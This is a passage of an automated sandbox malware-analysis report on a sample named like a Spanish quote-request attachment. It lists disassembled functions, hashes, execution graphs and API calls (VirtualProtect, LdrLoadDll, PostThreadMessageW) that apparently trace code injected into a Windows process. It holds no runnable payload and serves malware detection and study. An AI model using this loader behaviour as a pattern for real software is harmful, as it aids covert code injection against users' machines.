                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 91af523431dbd7c00b17dcbbc66346ac80f5ac1fd6405dd4222ea76b5003d792
                                                            • Instruction ID: 4dd26071e9a847213edab558715e00d368187df4086322f10af11db03594590d
                                                            • Opcode Fuzzy Hash: 91af523431dbd7c00b17dcbbc66346ac80f5ac1fd6405dd4222ea76b5003d792
                                                            • Instruction Fuzzy Hash: 55516C31A0C7494FD71D9F7888551B57FA2EB83320B1482BFD49AC72D7DD24A84687D1
                                                            Function 00007FF7C023587A Relevance: 1.6, APIs: 1, Instructions: 141memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 945 7ff7c023587a-7ff7c0235887 946 7ff7c0235889-7ff7c0235891 945->946 947 7ff7c0235892-7ff7c02358a3 945->947 946->947 948 7ff7c02358ae-7ff7c02358b9 947->948 949 7ff7c02358a5-7ff7c02358ad 947->949 950 7ff7c02358bb-7ff7c02358e5 948->950 951 7ff7c02358e6-7ff7c023595f VirtualProtect 948->951 949->948 950->951 954 7ff7c0235967-7ff7c023598f 951->954 955 7ff7c0235961 951->955 955->954
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 33354a73beb4c8ce53b5ec5fe50d8ec112e8a209250c1b7ba218f5574456a664
                                                            • Instruction ID: 03439451bdb645b58ee7fa01dbf8d7407f8e5613b6442291e88072d27a76515d
                                                            • Opcode Fuzzy Hash: 33354a73beb4c8ce53b5ec5fe50d8ec112e8a209250c1b7ba218f5574456a664
                                                            • Instruction Fuzzy Hash: 3741193090CB884FDB199BA898466F9BFF1EF56321F0442AFD089C3193CF646856C791
                                                            Function 00007FF7C03210C9 Relevance: .3, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467458673.00007FF7C0320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0320000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6edfde867d52d02861dc65ed0ba90770042b8757d2a25ffa77bfc93e67bb64d6
                                                            • Instruction ID: 0086e2cb941a228be3f0a480d6c6eb9ca158d2519a763bca3b64240ebf0dc8d8
                                                            • Opcode Fuzzy Hash: 6edfde867d52d02861dc65ed0ba90770042b8757d2a25ffa77bfc93e67bb64d6
                                                            • Instruction Fuzzy Hash: 7E71E53190CBC98FDB56EF3888655A5BBF1EF66310B4505EED08AC7293DB28B805C791

                                                            Non-executed Functions

                                                            Function 00007FF7C0246A79 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gfff
                                                            • API String ID: 0-1553575800
                                                            • Opcode ID: bafde092fbaec542ecb68d9d86044544d7d1d18a3988fea596a877581825cdf4
                                                            • Instruction ID: 00fc563bba5e58c0133fb5b59f72e4e1cb8133da67723cf5a547e167ce990c62
                                                            • Opcode Fuzzy Hash: bafde092fbaec542ecb68d9d86044544d7d1d18a3988fea596a877581825cdf4
                                                            • Instruction Fuzzy Hash: E751293264D7850FD30E9A7D5C5A4A17FE5EB8722070982FFD4C6CB2A7E518A80787D2

                                                            Execution Graph

                                                            Execution Coverage:1.4%
                                                            Dynamic/Decrypted Code Coverage:5%
                                                            Signature Coverage:7.8%
                                                            Total number of Nodes:141
                                                            Total number of Limit Nodes:10
                                                            execution_graph 79154 423f23 79155 423f3f 79154->79155 79156 423f67 79155->79156 79157 423f7b 79155->79157 79158 42b143 NtClose 79156->79158 79164 42b143 79157->79164 79160 423f70 79158->79160 79161 423f84 79167 42d133 RtlAllocateHeap 79161->79167 79163 423f8f 79165 42b15d 79164->79165 79166 42b16e NtClose 79165->79166 79166->79161 79167->79163 79306 42a753 79307 42a76d 79306->79307 79310 3662df0 LdrInitializeThunk 79307->79310 79308 42a795 79310->79308 79311 42e0f3 79312 42e103 79311->79312 79313 42e109 79311->79313 79314 42d0f3 RtlAllocateHeap 79313->79314 79315 42e12f 79314->79315 79316 4242b3 79317 4242c2 79316->79317 79318 42434c 79317->79318 79319 424309 79317->79319 79322 424347 79317->79322 79320 42d013 RtlFreeHeap 79319->79320 79321 424319 79320->79321 79323 42d013 RtlFreeHeap 79322->79323 79323->79318 79168 413b63 79169 413b73 79168->79169 79174 417553 79169->79174 79171 413be0 79172 413b9b 79172->79171 79173 413bd3 PostThreadMessageW 79172->79173 79173->79171 79175 417577 79174->79175 79176 4175b3 LdrLoadDll 79175->79176 79177 41757e 79175->79177 79176->79177 79177->79172 79178 41dcc3 79179 41dce9 79178->79179 79183 41ddd7 79179->79183 79184 42e223 79179->79184 79181 41dd7b 79181->79183 79190 42a7a3 79181->79190 79185 42e193 79184->79185 79187 42e1f0 79185->79187 79194 42d0f3 79185->79194 79187->79181 79188 42e1cd 79197 42d013 79188->79197 79191 42a7bd 79190->79191 79206 3662c0a 79191->79206 79192 42a7e9 79192->79183 79200 42b443 79194->79200 79196 42d10e 79196->79188 79203 42b493 79197->79203 79199 42d02c 79199->79187 79201 42b45d 79200->79201 79202 42b46e RtlAllocateHeap 79201->79202 79202->79196 79204 42b4b0 79203->79204 79205 42b4c1 RtlFreeHeap 79204->79205 79205->79199 79207 3662c1f LdrInitializeThunk 79206->79207 79208 3662c11 79206->79208 79207->79192 79208->79192 79209 41aba3 79210 41abe7 79209->79210 79211 41ac08 79210->79211 79212 42b143 NtClose 79210->79212 79212->79211 79324 413bf5 79325 413bd3 PostThreadMessageW 79324->79325 79326 413bfd 79324->79326 79327 413be0 79325->79327 79213 418744 79214 42b143 NtClose 79213->79214 79215 41874e 79214->79215 79216 3662b60 LdrInitializeThunk 79217 401a6b 79218 401a77 79217->79218 79221 42e5b3 79218->79221 79224 42cc13 79221->79224 79225 42cc39 79224->79225 79236 4073c3 79225->79236 79227 42cc4f 79228 401aa8 79227->79228 79239 41a9b3 79227->79239 79230 42cc6e 79231 42cc83 79230->79231 79254 42b4e3 79230->79254 79250 4271d3 79231->79250 79234 42cc92 79235 42b4e3 ExitProcess 79234->79235 79235->79228 79257 416283 79236->79257 79238 4073d0 79238->79227 79240 41a9df 79239->79240 79268 41a8a3 79240->79268 79243 41aa24 79246 41aa40 79243->79246 79248 42b143 NtClose 79243->79248 79244 41aa0c 79245 41aa17 79244->79245 79247 42b143 NtClose 79244->79247 79245->79230 79246->79230 79247->79245 79249 41aa36 79248->79249 79249->79230 79251 42722d 79250->79251 79253 42723a 79251->79253 79279 4180a3 79251->79279 79253->79234 79255 42b500 79254->79255 79256 42b511 ExitProcess 79255->79256 79256->79231 79258 416296 79257->79258 79260 4162af 79258->79260 79261 42bb93 79258->79261 79260->79238 79263 42bbab 79261->79263 79262 42bbcf 79262->79260 79263->79262 79264 42a7a3 LdrInitializeThunk 79263->79264 79265 42bc20 79264->79265 79266 42d013 RtlFreeHeap 79265->79266 79267 42bc35 79266->79267 79267->79260 79269 41a8bd 79268->79269 79273 41a999 79268->79273 79274 42a843 79269->79274 79272 42b143 NtClose 79272->79273 79273->79243 79273->79244 79275 42a85d 79274->79275 79278 36635c0 LdrInitializeThunk 79275->79278 79276 41a98d 79276->79272 79278->79276 79281 4180cd 79279->79281 79280 41852b 79280->79253 79281->79280 79287 413c93 79281->79287 79283 4181da 79283->79280 79284 42d013 RtlFreeHeap 79283->79284 79285 4181f2 79284->79285 79285->79280 79286 42b4e3 ExitProcess 79285->79286 79286->79280 79288 413cb2 79287->79288 79289 413e07 79288->79289 79292 413dd0 79288->79292 79296 4136e3 79288->79296 79289->79283 79291 413de4 79291->79289 79300 41acc3 RtlFreeHeap LdrInitializeThunk 79291->79300 79292->79289 79299 41acc3 RtlFreeHeap LdrInitializeThunk 79292->79299 79294 413dfd 79294->79283 79297 413701 79296->79297 79301 42b3b3 79296->79301 79297->79292 79299->79291 79300->79294 79302 42b3cd 79301->79302 79305 3662c70 LdrInitializeThunk 79302->79305 79303 42b3f5 79303->79297 79305->79303

                                                            Executed Functions

                                                            Function 00417553 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 90 417553-41756f 91 417577-41757c 90->91 92 417572 call 42dd13 90->92 93 417582-417590 call 42e233 91->93 94 41757e-417581 91->94 92->91 97 4175a0-4175b1 call 42c6e3 93->97 98 417592-41759d call 42e4d3 93->98 103 4175b3-4175c7 LdrLoadDll 97->103 104 4175ca-4175cd 97->104 98->97 103->104
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175C5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: cc12b25d517994b9bcc517731b469122a00c5f8ed43c7c54d5fb46cc540c6b3e
                                                            • Instruction ID: fafacfff03c406d328f9ed7d4dbcfc528020c249033774d8f048681923be9f41
                                                            • Opcode Fuzzy Hash: cc12b25d517994b9bcc517731b469122a00c5f8ed43c7c54d5fb46cc540c6b3e
                                                            • Instruction Fuzzy Hash: 53011EB5E4020DBBDF10DAE5DC42FDEB7B89B54308F0041AAE90897240F635EB548B95
                                                            Function 0042B143 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 115 42b143-42b17c call 404783 call 42c1e3 NtClose
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: a095f2cc110330fb65e3db0d0815f16563e75411f895d3cd10f7a49718a19118
                                                            • Instruction ID: 2aff59b114aa5f3b7d838e1b644e2537cdd7cbaedcee0386b42f69f80789310e
                                                            • Opcode Fuzzy Hash: a095f2cc110330fb65e3db0d0815f16563e75411f895d3cd10f7a49718a19118
                                                            • Instruction Fuzzy Hash: FDE046362002147BC620EA5AEC82F9F776CDBC6764F40401AFA1CA7242CAB5BA11C7E5
                                                            Function 036635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4913b913b703494538454b7d82031e4bff1fee7c6ca3158c0b89cd62e8dd9af2
                                                            • Instruction ID: 124da4ec5904d6468942789d86da37c76bbf3314d2e03caa83eb54ec6a7ece3f
                                                            • Opcode Fuzzy Hash: 4913b913b703494538454b7d82031e4bff1fee7c6ca3158c0b89cd62e8dd9af2
                                                            • Instruction Fuzzy Hash: 5190023160550802D100B5584519706100587D0201FA5C521A0424668E87D58E5165A2
                                                            Function 03662B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 129 3662b60-3662b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 053c19bdae925f6313b103893c57fe0d1263ab1e7aadbd4834db88613a267944
                                                            • Instruction ID: 6c6176b314bb4990f0b9c500050f9ff595f7c8eedccf3436c1538ebd183ecc93
                                                            • Opcode Fuzzy Hash: 053c19bdae925f6313b103893c57fe0d1263ab1e7aadbd4834db88613a267944
                                                            • Instruction Fuzzy Hash: D0900261202404034105B5584419616400A87E0201B95C131E1014690EC6658D916125
                                                            Function 03662DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a1721688691662e658dddb6d66d00e3f61b01bdce46a0c0797d5a8dbeecf83fb
                                                            • Instruction ID: 1ea41a71d086cbdab584eeff2fdb35fb41c25bd54b084ccafd086da9f9754c40
                                                            • Opcode Fuzzy Hash: a1721688691662e658dddb6d66d00e3f61b01bdce46a0c0797d5a8dbeecf83fb
                                                            • Instruction Fuzzy Hash: D590023120140813D111B5584509707000987D0241FD5C522A0424658E97968E52A121
                                                            Function 03662C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 130 3662c70-3662c7c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: dad630349b18bd1286e6aeca9782aa684b1e157529a3c5057c13d00fb5356b1f
                                                            • Instruction ID: 3cd50f2e8ccf7c6626df137516ffeb23f41b2c16615efc560867c857a2ad2eb4
                                                            • Opcode Fuzzy Hash: dad630349b18bd1286e6aeca9782aa684b1e157529a3c5057c13d00fb5356b1f
                                                            • Instruction Fuzzy Hash: 5B90023120148C02D110B558840974A000587D0301F99C521A4424758E87D58D917121
                                                            Function 00413B5B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 35083e93d7c499af6bf69726bce9b149e3f43427cf7b6ce97d13e8229f192a37
                                                            • Instruction ID: c255f3bd0e9e34b81c1a2fd59107513f68e7910af3c4f273d569b7e3037494ac
                                                            • Opcode Fuzzy Hash: 35083e93d7c499af6bf69726bce9b149e3f43427cf7b6ce97d13e8229f192a37
                                                            • Instruction Fuzzy Hash: 54113D71E0414C7AEB00AAA4EC82DEF7B7CDF41754F04416AF90477241E66D4E4687E5
                                                            Function 00413B44 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: da020c4ce43737df3c69372c4e09e9ddbc07101470960ff1b8c997d96d48b991
                                                            • Instruction ID: 34b13886dadd7fd07c39e188c78d343a6f93096d9b97f5e34d7094c2d9b74a5f
                                                            • Opcode Fuzzy Hash: da020c4ce43737df3c69372c4e09e9ddbc07101470960ff1b8c997d96d48b991
                                                            • Instruction Fuzzy Hash: 69016F72E4815C7ADB019AA9DC42DEFBB7CDF41355F00806AF908BB201D57D5F0647A5
                                                            Function 00413B63 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 02182858866b11fc36b05afde3c0cca24a80386001e4e64e3890204a7fa96743
                                                            • Instruction ID: 85ea797713ef2f1ffd4fa2af1e4491b1b69f7d82606ba95b39f9d8861668c0c0
                                                            • Opcode Fuzzy Hash: 02182858866b11fc36b05afde3c0cca24a80386001e4e64e3890204a7fa96743
                                                            • Instruction Fuzzy Hash: 5B01C8B1E0425C7ADB00AAE59C81DEF7B7CDF40758F048069FA0477241D67C5F0647A5
                                                            Function 00413B33 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 54 413b33-413b39 55 413b3b-413b40 54->55 56 413b8e-413bcd call 417553 call 4046f3 call 4243c3 54->56 55->56 63 413bed-413bf3 56->63 64 413bcf-413bde PostThreadMessageW 56->64 64->63 66 413be0-413bea 64->66 66->63
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: eee4938e4584ce92ac3c146049e7859fa5ea1016ba350731dcc4b08fc669d0e3
                                                            • Instruction ID: 9ed5e8185a674c2899785c177f71d45a7574e53354966d2f457e22f45eb20564
                                                            • Opcode Fuzzy Hash: eee4938e4584ce92ac3c146049e7859fa5ea1016ba350731dcc4b08fc669d0e3
                                                            • Instruction Fuzzy Hash: 5CF07DB6A0011C76DB005594AC81CFF676CCE80359F00C17AF904B7201E57D4F0147A5
                                                            Function 00413BF5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 67 413bf5-413bfb 68 413bd3-413bde PostThreadMessageW 67->68 69 413bfd 67->69 70 413be0-413bea 68->70 71 413bed-413bf3 68->71 70->71
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 33b9f56ef2263621a7ba271a972f579ab5ab6b3c3bee8db59496c64086e55f44
                                                            • Instruction ID: 8fe9385beedc6bbe6ef69c6083bae87f9348a7abf43a9996c95160a63fea186f
                                                            • Opcode Fuzzy Hash: 33b9f56ef2263621a7ba271a972f579ab5ab6b3c3bee8db59496c64086e55f44
                                                            • Instruction Fuzzy Hash: E5D02E3270A11D709221609C3C80CFBA38CC685AB3F000237FB08D0080FA096A4622B1
                                                            Function 0042B443 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 105 42b443-42b484 call 404783 call 42c1e3 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,0041DD7B,?,?,00000000,?,0041DD7B,?,?,?), ref: 0042B47F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 466c08e0599dceb2b1ac87d31f08fd08cfc95ce86fcefad45fa711f2d663cd9b
                                                            • Instruction ID: 3b5637f1d6a06553b0b5898cd5f4639ff1ffb45395e0277c21d2b4a116d8cd3c
                                                            • Opcode Fuzzy Hash: 466c08e0599dceb2b1ac87d31f08fd08cfc95ce86fcefad45fa711f2d663cd9b
                                                            • Instruction Fuzzy Hash: 3CE06D722002047BD610EE9ADC81EAB33ACEFC9710F404419FA0CA7242D670B9108AB9
                                                            Function 0042B493 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 110 42b493-42b4d7 call 404783 call 42c1e3 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,00416E20,000000F4,?,?,?,?,?), ref: 0042B4D2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: ff1f9aa8da99a8e5e4f90dc6e257a5551f3bffd3857a71a35f413fcecc4b40f6
                                                            • Instruction ID: 754ef0c31334b43114887b10ffae1144e8c009d02f4b77bdfd954f2ecf6ede40
                                                            • Opcode Fuzzy Hash: ff1f9aa8da99a8e5e4f90dc6e257a5551f3bffd3857a71a35f413fcecc4b40f6
                                                            • Instruction Fuzzy Hash: B9E039B2204214BBC610EA59DC41F9B33ACDBC9720F40401ABD08A7241CA70B911CAB9
                                                            Function 0042B4E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 120 42b4e3-42b51f call 404783 call 42c1e3 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,?,?,1F7C2165,?,?,1F7C2165), ref: 0042B51A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: d58103bc4f0944f419cde8c5d5e48aebb6a47aa2aba750f74cbfd609f9e9a146
                                                            • Instruction ID: e72e3ac899290caa13d09855136e694114c0080e93ee067bad854edb48cd4189
                                                            • Opcode Fuzzy Hash: d58103bc4f0944f419cde8c5d5e48aebb6a47aa2aba750f74cbfd609f9e9a146
                                                            • Instruction Fuzzy Hash: 80E04F762102147BD210BA5ADC41FAB775CDFC5754F40441AFA09A7141D6B17A10C6F5
                                                            Function 03662C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 125 3662c0a-3662c0f 126 3662c11-3662c18 125->126 127 3662c1f-3662c26 LdrInitializeThunk 125->127
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 978dc29c27a421ef65cc22e0aab14bf72594c989236d656efd518c9578f08b0c
                                                            • Instruction ID: bc81879311eb56542906667b969a49db7eb9f379020a9a890465bf9891db0fd4
                                                            • Opcode Fuzzy Hash: 978dc29c27a421ef65cc22e0aab14bf72594c989236d656efd518c9578f08b0c
                                                            • Instruction Fuzzy Hash: CAB092729029C9CAEB51EB604B0DB1B7A04ABD1741F6AC5B2E2030792F4779C5D1E2B6

                                                            Non-executed Functions

                                                            Function 036A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-2160512332
                                                            • Opcode ID: 5f40d42734fcbd4999965133b3dbfa265b75990c1715416be5865b0413b45386
                                                            • Instruction ID: 989ddae7c62a3bac6fbcf6e530cdf85b01d9f8b97ad2db864e1d28cf37ba5950
                                                            • Opcode Fuzzy Hash: 5f40d42734fcbd4999965133b3dbfa265b75990c1715416be5865b0413b45386
                                                            • Instruction Fuzzy Hash: 6D929875688B41ABD720DE28C990B6BB7E8BB84754F084C2DFA949B350D770EC44CF96
                                                            Function 03658620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036954CE
                                                            • Critical section address., xrefs: 03695502
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036954E2
                                                            • undeleted critical section in freed memory, xrefs: 0369542B
                                                            • Invalid debug info address of this critical section, xrefs: 036954B6
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0369540A, 03695496, 03695519
                                                            • double initialized or corrupted critical section, xrefs: 03695508
